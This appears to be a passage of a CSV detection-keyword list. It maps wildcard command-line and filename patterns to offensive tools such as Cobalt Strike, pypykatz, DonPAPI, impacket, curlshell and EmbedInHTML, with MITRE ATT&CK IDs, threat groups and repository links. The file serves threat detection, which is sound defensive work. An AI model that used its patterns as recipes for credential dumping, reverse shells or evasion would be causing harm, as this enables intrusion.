Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.news.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.nimplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*.pdf.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pdf.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.photos.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.pic.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.pipename_stager*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.pop.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.ppt.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ppt.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.js*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.pptx.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.ps1 -Base *OU=*DC=* -Credentials * -Server *,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,0,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*.py -credz *.txt * ,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*.py -k * -f *.bat -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.docm -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.docx -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.exe -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.js -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.pps -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.ppsx -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.ppt -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.ps1 -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xll -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xls -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xlsb -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xlsm -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py -k * -f *.xlsx -o *.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py rekall *.dmp* -t 0,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*.py * --fake-server*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*.py * amsi -disable*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*.py * amsi -enable*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*.py * --brop *,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*.py * --burp *,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,0,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*.py * -debug -dnstcp*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,0,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*.py * -k -no-pass*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*.py * --teamserver *,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*.py *.cs cs ms*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*.py *.exe *NormalDLL.dll*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,0,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*.py *0.0.0.0*--serve-forever*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*.py *--dependabot-workaround*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*.py 127.0.0.1 50050 logtracker password*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -"*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*.py --certificate *.pem --private-key *.pem --listen-port *,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*.py --client ftp --username * --password * --ip * --datatype ssn*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*.py --client https --data-size * --ip * --datatype cc*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration 